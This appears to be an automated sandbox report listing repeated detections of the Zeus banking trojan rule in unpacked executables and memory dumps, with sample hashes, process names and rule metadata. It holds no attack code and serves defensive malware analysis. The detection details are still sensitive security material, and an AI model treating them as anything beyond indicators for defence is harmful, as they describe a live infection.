Source: 1.2.svchost.exe.2515c00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.16.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.JbrLYfXaOpqnSngA.exe.2440000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.JbrLYfXaOpqnSngA.exe.24e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.JbrLYfXaOpqnSngA.exe.2440000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.JbrLYfXaOpqnSngA.exe.3290000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.a00000.46.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.JbrLYfXaOpqnSngA.exe.2f20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.JbrLYfXaOpqnSngA.exe.1282000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.JbrLYfXaOpqnSngA.exe.9a2000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.43.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.svchost.exe.2d20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.JbrLYfXaOpqnSngA.exe.2890000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.svchost.exe.39e0000.41.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2056864277.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2658112524.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000001.00000003.2089951115.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
